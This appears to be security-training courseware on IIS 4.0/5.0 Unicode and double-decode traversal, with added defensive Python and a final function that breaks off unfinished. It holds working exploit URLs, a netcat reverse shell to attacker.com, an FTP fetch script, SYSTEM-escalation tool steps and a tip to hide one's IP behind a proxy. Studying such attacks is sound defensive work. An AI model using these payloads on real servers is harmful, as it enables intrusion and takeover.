Exploit


One of the principal security functions of a web server is to restrict user requests so they can only access files within the web folders. Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended Unicode character representations are used in substitution for "/" and "\". This vulnerability provides a way for a malicious user to supply a specially crafted URL to the web site that will access any file whose name and location he knows, and which is located on the same logical drive as the web folders. This would potentially enable a malicious user who visited the web site to gain additional privileges on the machine; specifically, it could be used to gain privileges commensurate with those of a locally logged-on user. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it. For instance, consider the following valid URL.

http://target/scripts/..%c1%1c../path/file.ext

E.g.

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir

http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

Another exploit demonstrates how an attacker can execute commands using a redirect on the target host.

  • To begin, the attacker copies "..\..\winnt\system32\cmd.exe" to "..\..\inetpub\scripts\cmd1.exe".

  • He appends the command to the valid URL.

    http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe

    Vulnerable IIS returns: "CGI Error ... 1 file(s) copied."

    The error appears because the specified CGI application (cmd.exe) does not return a complete set of HTTP headers; the command output ("1 file(s) copied") is nevertheless included in the response, which confirms that the copy ran.

  • Next the attacker runs "cmd1.exe /c echo abc >aaa & dir & type aaa" along with the URL to list the directory contents.

    http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa

    Vulnerable IIS returns:

      Directory of c:\inetpub\scripts

      10/25/2000  03:48p      <DIR>          .
      10/25/2000  03:48p      <DIR>          ..
      10/25/2000  03:51p                   6 aaa
      12/07/1999  05:00a             236,304 cmd1.exe
      abc
start sidebar
Unicode
  • ASCII characters for the dots are replaced with their hexadecimal equivalent (%2E).

  • ASCII characters for the slashes are replaced with a Unicode equivalent (%c0%af).

  • Unicode 2.0 allows multiple encoding possibilities for each character.

  • Unicode for "/": 2f, c0af, e080af, f08080af, f8808080af, ...

  • Overlong Unicode forms are NOT malformed, but they are not allowed by a correct Unicode encoder and decoder.

  • They are used maliciously to bypass filters that only check the short Unicode form.

end sidebar
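To make the sidebar concrete, here is an added Python example (written for this page, not taken from the courseware or from IIS) that decodes percent-encoded URL path bytes with and without the shortest-form rule. The lenient mode models a decoder that looks only at the lead byte to learn the sequence length and so maps %c0%af to "/" and %c1%9c to "\", which is the class of behaviour the sidebar describes; the strict mode rejects the same bytes as overlong, which is also what Python's own bytes.decode("utf-8") does. The sample paths are constructed from the URLs shown above; classify_path() is a helper invented here for a filter or log reviewer.

```python
from urllib.parse import unquote_to_bytes


class OverlongSequence(ValueError):
    """Raised in strict mode when a multibyte sequence encodes a code point it is too long for."""


# Smallest code point that a 2-, 3- or 4-byte UTF-8 sequence is allowed to encode.
MIN_SCALAR = {1: 0x80, 2: 0x800, 3: 0x10000}


def decode_utf8(data: bytes, strict: bool = True) -> str:
    """Hand-written UTF-8 decoder.

    strict=True  : enforces the shortest-form rule (a correct decoder).
    strict=False : accepts overlong forms, the behaviour the sidebar describes,
                   so bytes C0 AF come back as '/' and C1 9C as a backslash.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:                       # plain ASCII byte
            out.append(chr(b))
            i += 1
            continue
        if b & 0xE0 == 0xC0:               # 110xxxxx -> one continuation byte
            n, cp = 1, b & 0x1F
        elif b & 0xF0 == 0xE0:             # 1110xxxx -> two continuation bytes
            n, cp = 2, b & 0x0F
        elif b & 0xF8 == 0xF0:             # 11110xxx -> three continuation bytes
            n, cp = 3, b & 0x07
        else:
            raise ValueError(f"invalid lead byte {b:#04x}")
        tail = data[i + 1:i + 1 + n]
        if len(tail) != n or any(t & 0xC0 != 0x80 for t in tail):
            raise ValueError("truncated or malformed continuation bytes")
        for t in tail:                     # accumulate the 6 payload bits of each continuation byte
            cp = (cp << 6) | (t & 0x3F)
        if strict and cp < MIN_SCALAR[n]:  # the shortest-form rule a lenient decoder skips
            raise OverlongSequence(
                f"{data[i:i + 1 + n].hex()} is an overlong form of U+{cp:04X}")
        out.append(chr(cp))                # chr() itself rejects values above U+10FFFF
        i += 1 + n
    return "".join(out)


def classify_path(encoded_path: str) -> str:
    """Label a percent-encoded URL path for a filter or log reviewer:
    'ascii', 'utf8' (well-formed non-ASCII), 'overlong' or 'invalid'."""
    raw = unquote_to_bytes(encoded_path)
    try:
        decode_utf8(raw, strict=True)
        return "ascii" if raw.isascii() else "utf8"
    except OverlongSequence:
        return "overlong"
    except ValueError:
        return "invalid"


if __name__ == "__main__":
    # Constructed samples based on the URLs in the text above.
    for p in ("/scripts/..%c0%af../winnt/system32/cmd.exe",
              "/scripts/..%c1%9c../", "/scripts/%e2%82%ac.asp", "/scripts/upload.asp"):
        raw = unquote_to_bytes(p)
        print(f"{p:45} strict={classify_path(p):8} lenient={decode_utf8(raw, strict=False)!r}")
```

The point for a filter author is that any check run on the percent-decoded bytes must use a strict decoder: the same two bytes are a harmless "invalid input" to a correct decoder and a path separator to a lenient one.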
 

Unicode extensions are installed by default with Microsoft Internet Information Server (IIS) version 4.0 and 5.0. This is to allow characters that are not used in the English language to be recognized by web servers. Computers store letters and other characters by assigning a number to them.

Unicode provides a unique number for every character. Unicode forms a single character set across all languages. It is a standard 2-byte or 3-byte character set. The IIS Unicode Exploit allows users to run arbitrary commands on the web server. IIS servers with the Unicode extensions loaded are vulnerable unless they are running current patches.

This exploit can be used when:

  1. A writeable or executable directory is available, allowing attackers to upload malicious code.

  2. A system executable such as cmd.exe is available on the root and does not have an access control list applied to it.

The attack occurs when an attacker sends a malformed URL to a web server that looks something like this:

  1. http://victim/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:

If the target has a virtual executable directory (e.g. scripts) located on the same logical drive as the Windows system folder, the directory of C: will be revealed. The question mark inserted after cmd.exe introduces a command line argument.

For instance, appending /c, as in the above example, tells cmd.exe to carry out the command specified by the following string and then terminate. The "+" represents the space between arguments. The sequence /..%255c..%255c decodes to /..\..\, which translates to a directory traversal.

This is equivalent to sending a hex value to the server; a common example is %20, which represents a space. A directory traversal sent as a plain hex value (such as %5c) is caught by the IIS check and refused with "access denied".

Still, the exploit works because the CGI routine within the web server decodes the address twice. First the CGI filename is decoded to check whether it is an executable file (e.g. '.exe' or '.com'). After the filename check, IIS runs another decode process. An attacker therefore sends various hex encodings of the required character until a suitable value is accepted.

Thus '..\' can be represented by '..%255c', '..%%35c', etc. After the first decoding, '..%255c' is turned into '..%5c', which IIS takes as a legal character string that passes the security check. However, after the second decode process, it is turned into '..\' and the attack succeeds.

  1. http://www.somesite.com/../../../../../winnt/repair/sam._

In this case, the web server will simply look in the web root directory for a file called "../../../../../winnt/repair/sam._". Each '../' tells the web server to go one directory up, so here the web server looks in the document root for a file called winnt/repair/sam._. The number of '../' sequences does not matter as long as there are enough of them to traverse back to the root of the file system (either C: or / on a UNIX system).

The IIS Unicode exploit uses the HTTP protocol and malformed URLs to traverse directories and execute arbitrary commands on vulnerable web servers. The IIS Unicode exploit uses a Unicode representation of a directory delimiter (/) to fool IIS. Because the exploit uses HTTP, it works directly from the address bar of a browser. Because of the non-interactive nature of this exploit, interactive commands such as ftp and telnet do not work.

start sidebar
IIS Logs
  • IIS logs all visits in log files. The log files are located under %systemroot%\logfiles.

  • Be careful. If you don't use a proxy, your IP will be logged.

  • This command lists the log files:

 http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1
end sidebar
 
Note  

Capturing and maintaining log files is critical to the secure administration of a web server. While it is generally accepted that the log does not capture an intrusion until after the request has been processed, a diligent administrator can couple logging with tools such as URLScan, which makes logging more effective. Here, we will discuss some of the best practices that can be followed when it comes to IIS logs. The best way to emphasize the value and importance of IIS log files is to draw a comparison to a crime scene: while handling IIS logs, they must be treated as if they are already evidence. Coupling IIS logs with other monitoring records such as firewall logs, IDS logs, and even tcpdump captures lends more credibility in the event of the log being used as evidence.

The first rule is to configure the IIS logs to record every available field. Gathering information about Web visitors can help establish the source of an attack - either by linking it to a system or to a user. The more information that is collected, the better chance there is of pinning down the perpetrator.

The second rule is to capture events with a proper time stamp. This is because IIS records logs using UTC time. The accuracy of the UTC time can be ensured only if the local time zone setting is correct.

The third rule is to ensure continuity in the logs. IIS logs do not register a log entry if the server does not get any hits in a 24-hour period. This makes the presence of an empty log file ambiguous, as there is no way of telling whether the server received no hits, was offline, or whether the log file was actually deleted. The simplest workaround is to use the Task Scheduler to schedule hits. Scheduled requests then show that the logging mechanism is functioning properly, so if a log file is missing, it was probably deleted intentionally.

The fourth rule is to ensure that logs are not modified in any way after they have been recorded. Once a log file is created, it is important to prevent the file from being accessed and to audit any authorized and unauthorized access. One way to achieve this is to move the IIS logs off the Web server. File signatures are helpful because if a single file is corrupted, it does not invalidate the rest of the logs. Also, log file analysis must never be done on the original files. After the log is closed, no one should have permissions to modify the file contents.
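As an added example of what these rules look like in practice (code written for this page, not part of the courseware or of IIS), the Python below parses constructed IIS W3C extended log lines, flags requests that carry the traversal patterns discussed in this chapter (overlong UTF-8 lead bytes, double percent-encoding, a ".." segment after full decoding, a path into the Windows system directory, or a cmd*.exe target), and records a SHA-256 seal plus entry count for a closed log so that a later scrub of entries by source address, the kind of cleanup the CleanIISLog tool described further down performs, is detectable. The log lines, client addresses and status codes are constructed; the #Fields directive follows the W3C extended format that IIS writes.

```python
import hashlib
import re
from urllib.parse import unquote_to_bytes

# Constructed sample in IIS W3C extended log format (not a real capture).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-25 15:48:01 10.0.0.7 GET /default.htm - 200
2000-10-25 15:48:02 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2000-10-25 15:48:03 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c: 200
2000-10-25 15:48:04 10.0.0.5 GET /scripts/cmd1.exe /c+echo+abc+>aaa&dir&type+aaa 502
2000-10-25 15:48:05 10.0.0.9 GET /scripts/upload.asp - 200
2000-10-25 15:48:06 10.0.0.5 GET /scripts/../../winnt/repair/sam._ - 404
"""

# Byte signature for overlong UTF-8: lead bytes C0/C1 are never valid, and E0/F0 followed by
# a too-small second byte encode a code point that a shorter sequence should have carried.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]|\xf0[\x80-\x8f][\x80-\xbf]{2}")


def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split(" ")))


def decode_fully(stem, limit=3):
    """Percent-decode until the value stops changing; more than one round means double encoding."""
    data = stem.encode("ascii", "replace")
    rounds = 0
    while rounds < limit:
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds


def triage(entry):
    """Return the list of reasons an entry looks like a file system traversal attempt."""
    data, rounds = decode_fully(entry["cs-uri-stem"])
    reasons = []
    if rounds > 1:
        reasons.append("double-encoded")
    if OVERLONG.search(data):
        reasons.append("overlong-utf8")
    # Worst case for a lenient decoder: every overlong form could be a separator, so treat it as one.
    text = OVERLONG.sub(b"/", data).decode("latin-1").replace("\\", "/")
    segments = text.split("/")
    if ".." in segments:
        reasons.append("parent-traversal")
    if "/winnt/" in text.lower() or "/system32/" in text.lower():
        reasons.append("system-path")
    if re.fullmatch(r"cmd\w*\.exe", segments[-1], re.IGNORECASE):
        reasons.append("command-shell")
    return reasons


def scan(text):
    """Entries worth an analyst's attention, with the client address and the reasons."""
    hits = []
    for entry in parse_w3c(text):
        reasons = triage(entry)
        if reasons:
            hits.append({"c-ip": entry["c-ip"], "cs-uri-stem": entry["cs-uri-stem"], "reasons": reasons})
    return hits


def seal(text):
    """Integrity record for a CLOSED log file: hash of its bytes plus its entry count (rule four)."""
    return {"sha256": hashlib.sha256(text.encode()).hexdigest(),
            "entries": sum(1 for _ in parse_w3c(text))}


def verify(text, record):
    """True only if the file still matches the record taken when it was closed."""
    return seal(text) == record


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["c-ip"], hit["cs-uri-stem"], ", ".join(hit["reasons"]))
    record = seal(SAMPLE_LOG)
    scrubbed = "".join(l + "\n" for l in SAMPLE_LOG.splitlines() if "10.0.0.5" not in l)
    print("original intact:", verify(SAMPLE_LOG, record), "| scrubbed intact:", verify(scrubbed, record))
```

The seal is only useful if it is taken when the file closes and stored somewhere the web server's own accounts cannot write, which is the reason the text recommends moving logs off the server; a hash kept beside the log on the same host is as easy to rewrite as the log itself.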

start sidebar
Hacking Tool: IISxploit.exe

This tool automates the directory traversal exploit in IIS.

end sidebar
 

Perhaps the vulnerability that has had the most telling effect after the buffer overflow is the file system traversal vulnerability. The two file system traversal exploits that have hogged the limelight are the Unicode and the double decode (sometimes termed superfluous decode) attacks.

The Unicode vulnerability was first seen in the Packetstorm forums in early 2001 and formally developed by Rain Forest Puppy (RFP). In his exposition of the problem, he notes that "%c0%af and %c1%9c are overlong Unicode representations for '/' and '\'. IIS seems to decode Unicode at the wrong instance (after path checking, rather than before)."

Threat  

If an attacker gives an HTTP request such as the one that follows , arbitrary commands can be executed on the server:

GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+'c:\' HTTP/1.0

Several other "illegal" representations of "/" and "\" are feasible as well, including %c1%1c, %c1%9c, %c0%9v, %c0%af, %c0%qf, %c1%8s, and %c1%pc.

Tools  

IISxploit by greek pirate allows the user to exploit the directory traversal vulnerability in IIS. The GUI allows the user to key in the target name and also specify a spoofed IP. The user can then choose to read, download, and delete files on the target machine.

start sidebar
Hacking Tool: execiis-win32.exe

This tool exploits IIS directory traversal, takes commands from cmd and executes them on the IIS server.

end sidebar
 

The NSFOCUS Security Team reported a vulnerability in the filename processing of CGI programs in MS IIS 4.0/5.0: the CGI filename was erroneously decoded twice. By exploiting this vulnerability, it was possible for an intruder to run arbitrary system commands. The exploit is possible because of the way IIS loads an executable CGI program. First, the CGI filename is decoded to check whether it is an executable file (for example, an '.exe' or '.com' suffix check). On successfully passing the filename check, IIS runs another decode process. Normally, only the CGI parameters should be decoded in this pass. However, IIS mistakenly decodes both the CGI parameters and the already decoded CGI filename. In this way, the CGI filename is decoded twice by error.

Threat  

With a malformed CGI filename, an attacker can get round IIS filename security checks such as the '../' or './' check. In some cases, the attacker can also run arbitrary system commands.

For example, the character '\' is encoded as "%5c", and the codes of these three characters are: '%' = %25, '5' = %35 and 'c' = %63. Encoding these three characters again can result in %255c, %%35c, %%35%63, %25%35%63, etc. This makes it possible to represent '..\' by '..%255c', '..%%35c', etc.

After the first decoding, '..%255c' is turned into '..%5c'. IIS takes it as a legal character string that passes the security check. However, after the second decode process, it is turned into '..\'. Hence, the attacker can use '..\' to do directory traversal and run arbitrary programs outside the Web directory.
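The double decode described earlier in the Unicode section and the NSFOCUS account just above are the same ordering defect, so here is one added Python model of it, written for this page rather than taken from IIS, NSFOCUS or the courseware. vulnerable_order() decodes the requested name once, runs a literal '..' check, and then decodes again before resolving the file, which is the sequence the text describes; hardened_order() decodes exactly once, refuses anything that still looks encoded, canonicalises the path, and only then checks that the result stays inside the web root. The web root value is an assumption chosen for the example, and POSIX separators are used so it runs on any platform.

```python
import posixpath
from urllib.parse import unquote

# Constructed web root for the example (assumption; on IIS it would be a path such as c:\inetpub\scripts).
WEB_ROOT = "/inetpub/scripts"


def has_dotdot(path: str) -> bool:
    """The literal check the text says IIS applied: is any path segment exactly '..'?"""
    return ".." in path.replace("\\", "/").split("/")


def resolve(path: str) -> str:
    """Map a request path onto the file system by joining it to the web root and normalising."""
    relative = path.replace("\\", "/").lstrip("/")
    return posixpath.normpath(posixpath.join(WEB_ROOT, relative))


def vulnerable_order(raw: str):
    """Decode, check, decode AGAIN, resolve: the superfluous second decode undoes the check."""
    once = unquote(raw)
    if has_dotdot(once):
        return ("rejected", once)
    twice = unquote(once)              # second decode turns '..%5c' into a '..' plus backslash
    return ("served", resolve(twice))


def hardened_order(raw: str):
    """Decode exactly once, reject leftover encoding, canonicalise, then check containment."""
    once = unquote(raw)
    if "%" in once:                    # a '%' that survived decoding means nested encoding
        return ("rejected", "encoded data remained after decoding")
    target = resolve(once)
    if target != WEB_ROOT and not target.startswith(WEB_ROOT + "/"):
        return ("rejected", target)    # the canonical path escaped the web root
    return ("served", target)


if __name__ == "__main__":
    # Constructed requests: the double-encoded form from the text, its plain hex form, and a normal file.
    for req in ("..%255c..%255cwinnt/system32/cmd.exe", "..%5c..%5cwinnt/system32/cmd.exe", "upload.asp"):
        print(f"{req:40} flawed={vulnerable_order(req)}  hardened={hardened_order(req)}")
```

Two design points carry over to any server or filter: the check has to run on the fully canonical path, not on an intermediate string, and containment against the root is a stronger test than searching for '..' because it does not depend on guessing which encodings the rest of the pipeline will still strip.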

Tools  

Execiis-win32.exe exploits IIS directory traversal, takes commands from cmd.exe, and executes them on the IIS server.

start sidebar
Hacking Tool: Unicodeuploader.pl
  • Unicode upload creator (unicodeloader.pl) works as follows:

    Two files (upload.asp and upload.inc - have them in the same dir as the PERL script) are built in the webroot (or any where else) using echo and some conversion strings. These files allow you to upload any file by simply surfing with a browser to the server.

    1. Find the webroot

    2. perl unicodeloader target:80 'webroot'

    3. surf to target/upload.asp and upload nc.exe

    4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'

    5. telnet target 80

  • The above procedure will drop you into a shell on the box.

end sidebar
 
Tools  

Unicodeuploader.pl is a Perl script written by Roelof Temmingh to exploit the Unicode vulnerability in Windows. There are three components involved in the exploit. Two files (upload.asp and upload.inc, hosted in the same directory as the Perl script) are built in the webroot using echo and some conversion strings. These files allow the attacker to upload any file by simply surfing with a browser to the server.

Typical use: (5 easy steps to a shell)

  1. Find the webroot - example: d:\webpage\root

  2. perl unicodeloader target:80 'd:\webpage\root'

  3. Surf to target/upload.asp and upload nc.exe

  4. perl unicodexecute3.pl target:80 'd:\webpage\root\nc -l -p 80 -e cmd.exe'

  5. Telnet target 80

Threat  

The above procedure will invoke a shell on the target without crashing the server. The attacker can then proceed to upload other malicious code right after nc.exe. This procedure works well for servers that are tightly firewalled (as it uses the allowed port 80), i.e. servers that are not allowed to FTP, RCP or TFTP to the Internet.

start sidebar
Hacking Tool: cmdasp.asp
  • After uploading nc.exe to the web server, you can shovel a shell back to your pc.

  • Shoveling a shell back to the attacker's system is easy:

    1. Start a netcat listener on the attacker's system:

       c:\>nc.exe -l -p 2002
    2. Use cmdasp.asp to shovel a netcat shell back to the listener:

       c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002 
end sidebar
 

The attacker can also choose to extend this exploit by shoveling a shell back to his system. Shoveling a shell back to the attacker's system is easy:

  1. Start a netcat listener on the attacker's system: c:\>nc.exe -l -p 2002

  2. Use cmdasp.asp to shovel a netcat shell back to the listener: c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002

Tools  

CmdAsp.asp is an interactive ASP page command prompt. It works on IIS web servers that are vulnerable through the use of the IUSR_COMPUTER and IWAM_COMPUTER user accounts. These accounts execute scripts such as ASP or Perl. It is important to note that these accounts belong to the Everyone group.

In IIS 5, any process started by a wscript.shell object runs in the context of the IWAM_* account, and can be a point of attack as demonstrated by cmdasp.asp. It runs in the context of the web server as a standard ASP page and makes a good back door to any IIS web server.

The script assumes that IUSR_COMPUTER can write to the root directory "c:\". This is true for default NT/2000 installs. However, the script does not require write access to the file system in order to execute commands; write access is only required for viewing the piped output of the commands.

Echo OPEN 10.0.2.0 > c:\ftp.txt & vol

Echo USER anonymous hacked@yourcompany.com >> c:\ftp.txt & vol

Echo GET myfile >> c: \ftp.txt & vol

Echo BYE >> c:\ftp.txt & vol

Cd c:\ & ftp -n -s:c:\ftp.txt

Del c:\ftp.txt

start sidebar
Escalating Privileges on IIS
  • On IIS 4, the LPC ports can be exploited using hk.exe

  • hk.exe runs commands using the SYSTEM account on Windows, allowing intruders to simply add the IUSR or IWAM account to the local Administrators group.

     hk.exe net localgroup administrators IUSR_machinename /add 
  • Note: LPC port vulnerability is patched on IIS 5.0

end sidebar
 

Applications within Windows are entirely controlled through the use of messages. However, on Win32 the mechanism for controlling these messages is flawed. Any application on a given desktop can send a message to any window on the same desktop, regardless of whether or not that window is owned by the sending application, and regardless of whether the target application wants to receive those messages.

Tools  

Hk.exe is a program that exploits a vulnerability in the Win32 API (LPC, local procedure call) that can be used to run commands (net view, net share, net use, etc.) with system-level access.

Hk.exe is a local privilege escalation exploit that runs processes as SYSTEM. Attackers can then run netcat via hk.exe, connect to the listener, and execute processes with SYSTEM privileges.

For instance, the following command will shovel a shell to the attacker's port. Note that hk only works on NT4.

Hk nc -d -e cmd.exe attacker:port

start sidebar
Hacking Tool: iiscrack.dll
  • iiscrack.dll works like upload.asp and cmd.asp.

  • iiscrack.dll provides a form-based input for attackers to enter commands to be run with SYSTEM privileges.

  • An attacker could rename iiscrack.dll to idq.dll, upload the trojan DLL to c:\inetpub\scripts using upload.asp and execute it via the web browser using:

    http://victim.com/scripts/idq.dll

  • The attacker now has the option to run virtually any command as SYSTEM

end sidebar
 

Privilege elevation vulnerability arises because of a flaw in a table that IIS 5.0 consults when determining whether a process should be in process or out-of-process. IIS supports three different modes of process isolation. These modes control how well the IIS process is isolated from the processes that are being invoked as part of the request processing.

IIS 5.0 contains a table that lists the system files that should always run in-process. The vulnerability results because the list that specifies the names does so using relative paths as well as absolute paths. This use of relative paths means that if an executable having the same name as one on the list were uploaded to any folder on the server and executed, it would run in process. Once this occurred, the executable could, by definition, gain system privileges.

Due to a weakness in IIS, several dll files were always executed by the least secure isolation level regardless of the actual process isolation settings. By adding or replacing one of these dlls with a malicious version, an attacker could run arbitrary code with SYSTEM privileges. On a misconfigured server, if an attacker is able to load a program of his choice and execute it, the code would be able to gain system privileges. This would give the attacker complete control of the server. He could do anything he wished, from modifying web pages, to reconfiguring the server, to reformatting the hard drive.

Tools  

One way of doing this would be to use iiscrack.dll, which works like upload.asp and cmd.asp. iiscrack.dll provides a form-based input for attackers to enter commands to be run with SYSTEM privileges. An attacker could rename iiscrack.dll to idq.dll, upload the trojan DLL to c:\inetpub\scripts using upload.asp and execute it with the web browser using: http://victim.com/scripts/idq.dll. The attacker now has the option to run virtually any command as SYSTEM.

start sidebar
Hacking Tool: ispc.exe
  • ISPC.exe is a Win32 client that is used to connect a trojan ISAPI DLL (idq.dll).

  • Once the trojan DLL is copied to the victim webserver (/scripts/idq.dll), the attacker can execute ispc.exe and immediately obtain a remote shell running as SYSTEM.

     c:\>ispc.exe victim.com/scripts/idq.dll 80 
end sidebar
 

This exploit tool is similar in that it requires inserting a rogue .dll file into a web directory, recommends the use of either the Unicode or Double Decode exploits in order to accomplish this, and produces SYSTEM-level access. It is different in that it has two components: a client file, ispc.exe, for connecting from the attacker's machine, and idq.dll (or one of the other in-process .dll files listed under Usage below), a server-side ISAPI program for privilege escalation. It is also different in that it is executed from a command prompt at the attacker's machine, rather than from a browser.

This software makes use of the IIS 5.0 + SP0, SP1, SP2 privilege checking hole to obtain SYSTEM privilege; all that is needed is to upload idq.dll to an executable directory of IIS, to obtain SYSTEM privilege.

Usage:

First use the UNICODE or double decoding hole to upload idq.dll to an executable directory, for example /scripts, and then use ispc.exe to connect:

     C:\>ispc 127.0.0.1/scripts/idq.dll
     C:\WINNT\system32>

The cmd.exe thus obtained has SYSTEM privileges.

  1. After you've uploaded idq.dll to an IIS executable directory, it must be called one of the following: idq.dll, httpext.dll, httpodbc.dll, ssinc.dll, msw3prt.dll, author.dll, Admin.dll, shtml.dll, sspifilt.dll, compfilt.dll, pwsdata.dll, md5filt.dll, fpexedll.dll

    If another name is used, then there's no way to obtain SYSTEM privilege.

  2. After you've finished entering a command, you must hit carriage return three times, to get a prompt back.

  3. SP3 is not affected by this hole.
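Since the names in the list above are exactly what make an uploaded DLL run in-process, a defender can audit web content directories for them. The Python below is an added example written for this page, not part of IIS or of any tool named here; it builds a throwaway directory tree shaped like an inetpub layout (constructed, with two planted files included on purpose) and reports every file whose name collides with the in-process list, matched case-insensitively because NTFS names are. The assumption behind the check is that web content and script directories should never contain these DLLs, since the genuine copies live under the system directories.

```python
import os
import tempfile

# Names the text above says IIS 5.0 (before SP3) always loads in-process.
IN_PROCESS_NAMES = {
    "idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll", "author.dll",
    "admin.dll", "shtml.dll", "sspifilt.dll", "compfilt.dll", "pwsdata.dll", "md5filt.dll",
    "fpexedll.dll",
}


def find_planted_dlls(content_roots):
    """Walk the given content directories and return every file whose name is on the in-process list."""
    hits = []
    for root in content_roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if name.lower() in IN_PROCESS_NAMES:      # NTFS names are case-insensitive
                    hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def demo():
    """Constructed inetpub-like tree; returns hits relative to its base so the result is portable."""
    with tempfile.TemporaryDirectory() as base:
        scripts = os.path.join(base, "scripts")
        images = os.path.join(base, "wwwroot", "images")
        os.makedirs(scripts)
        os.makedirs(images)
        # Two harmless files and two planted ones (Idq.dll and ssinc.DLL) for the scan to find.
        for rel in (("scripts", "upload.asp"), ("scripts", "Idq.dll"),
                    ("wwwroot", "default.htm"), ("wwwroot", "images", "ssinc.DLL")):
            open(os.path.join(base, *rel), "w").close()
        hits = find_planted_dlls([scripts, os.path.join(base, "wwwroot")])
        return [os.path.relpath(h, base).replace(os.sep, "/") for h in hits]


if __name__ == "__main__":
    for hit in demo():
        print("in-process DLL name found in a content directory:", hit)
```

On a real server the content roots would be the IIS virtual directories (for example the scripts and wwwroot folders under inetpub), and a hit is worth treating as an incident rather than a misplaced file, since the text explains that such a file runs as SYSTEM the moment it is requested.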

start sidebar
Unspecified Executable Path Vulnerability
  • When executables and DLL files are not preceded by a path in the registry (e.g. explorer.exe does not have a fixed path by default).

  • Windows NT 4.0 / 2000 will search for the file in the following locations in this order:

    • the directory from which the application loaded.

    • the current directory of the parent process,

    • ...\system32

    • ...\system

    • the windows directory

    • the directories specified in the PATH environment variable

end sidebar
 

The registry entry that specifies the Windows Shell executable (Explorer.exe) provides a relative, rather than absolute, path name. When executables and DLL files are not preceded by a path in the registry (e.g. explorer.exe does not have a fixed path by default), Windows NT 4.0 / 2000 will search for the file in the following locations, in this order: the directory from which the application loaded; the current directory of the parent process; ...\System32; ...\System; the Windows directory; the directories specified in the PATH environment variable.

The Windows Shell is the familiar desktop that is used for interacting with Windows. During system startup, Windows NT 4.0 and Windows 2000 consult the "Shell" registry entry, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, to determine the name of the executable that should be loaded as the Shell. By default, this value specifies Explorer.exe.

This opens up the possibility of automatic execution of Trojans if they are named after executables that do not have a path specified. Using the example of explorer.exe, a Trojan so named could be written to the root directory. At system startup time, the normal search order would cause any file named Explorer.exe in the %Systemdrive%\ directory to be loaded in place of the bona fide version. This could provide an opportunity for a malicious user to cause code of his choice to run when another user subsequently logged onto the same machine. Remote exploitation is feasible if the root directory is accessible through a share or if a malicious user were to implant the Trojan onto the root directory through other means.
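The search order above is what lets a same-named file in the root directory win over the genuine Explorer.exe. As an added example (not from the courseware), the Python below models that order with ntpath, so the Windows-style paths work on any platform, resolves an unqualified name against a constructed list of existing files, and reports when something earlier in the order shadows the location that was expected. The directory values (Winlogon's own directory, a startup working directory at the drive root, the PATH string) and the file lists are assumptions made for the illustration.

```python
import ntpath


def search_order(app_dir, parent_cwd, windows_dir, path_env):
    """Directories in the order the text gives for NT 4.0 / 2000 when no path is specified."""
    dirs = [app_dir, parent_cwd,
            ntpath.join(windows_dir, "System32"),
            ntpath.join(windows_dir, "System"),
            windows_dir]
    dirs += [p for p in path_env.split(";") if p]
    return dirs


def resolve(name, dirs, existing_files):
    """First directory in search order that holds the name; existing_files is the constructed file list."""
    present = {p.lower() for p in existing_files}      # Windows path comparison is case-insensitive
    for d in dirs:
        candidate = ntpath.join(d, name)
        if candidate.lower() in present:
            return candidate
    return None


def shadowed_by(name, expected, dirs, existing_files):
    """Return the path that would load INSTEAD of the expected one, or None if the expected one wins."""
    winner = resolve(name, dirs, existing_files)
    if winner is None or winner.lower() == expected.lower():
        return None
    return winner


# Constructed scenario (assumption): the shell is started from System32 while the working
# directory is the drive root, with a typical PATH.
ORDER = search_order(r"C:\WINNT\system32", "C:\\", r"C:\WINNT", r"C:\WINNT\system32;C:\WINNT")
GENUINE_SHELL = r"C:\WINNT\explorer.exe"


def clean_system():
    """Only the genuine shell exists: nothing earlier in the order shadows it."""
    return shadowed_by("explorer.exe", GENUINE_SHELL, ORDER,
                       [GENUINE_SHELL, r"C:\WINNT\system32\cmd.exe"])


def planted_root():
    """A same-named file sits in the drive root, which the order visits before the Windows directory."""
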